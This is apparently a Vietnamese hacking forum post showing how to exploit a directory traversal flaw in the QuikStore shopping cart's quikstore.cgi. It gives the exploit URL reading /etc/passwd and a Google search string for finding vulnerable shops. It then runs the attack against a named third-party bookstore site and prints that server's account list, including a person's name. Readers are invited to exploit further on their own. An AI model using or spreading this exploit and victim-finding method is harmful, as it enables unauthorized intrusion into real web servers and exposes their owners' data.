Hack QuikStore Shopping Cart

trang này đã được đọc lần

Lỗi của QuikStore Shopping Cart cho phép view bằng cách xử dụng ../../../

File bị lỗi : quikstore.cgi

Cách khai thác

http://[target]/quikstore.cgi?category=<mặt hàng nào đó>&template=../../../../../../../../../../../../etc/passwd


Cách tìm lỗi này có cả đống trên google, chỉ việc search cụm từ sau
allinurl: quikstore.cgi

Sau khi view được trên host thì mục tiêu tiếp theo cần phải làm gì và khai thác tiếp như thế nào thì tùy mỗi người có cách khai thác riêng

Ví dụ một site mình lấy từ trên google

http://www.rootsandwingsbooks.com/quikstore.cgi?category=PEA&template=../../../../../../etc/passwd

Kết quả


CODE
root:*:0:1:system PRIVILEGED account:/:/bin/tcsh nobody:*Nologin:65534:65534:anonymous NFS user:/: nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/: daemon:*:1:1:system background account:/: bin:*:3:4:system librarian account:/bin: uucp::4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico uucpa::4:2:uucp adminstrative account:/usr/lib/uucp: auth:*:6:11:Authentication Subsystem:/tcb/bin: cron:*:7:14:Cron Subsystem:/usr/adm/cron: lp:*:8:12:Line Printer Subsystem:/users/lp: tcb:*:9:18:Trusted Computing Base:/tcb: adm:*:10:19:Administration Subsystem:/usr/adm: ris::11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh wnn::12:1:Wnn System Account:/tmp:/bin/sh cantelow:*:17:15:Ann Cantelow1:/usr/users3/cantelow:/usr/bin/tcsh lanman::100:99:ASDU Server:/usr/net/servers/lanman:/bin/false lmxadmin::200:99:ASDU Server Administrator:/usr/lmxadmin:/bin/sh lmxguest:*:201:99:ASDU Server Guest:/usr/users/lmxguest:/bin/false ... còn tiếp dài quá nên không chép ra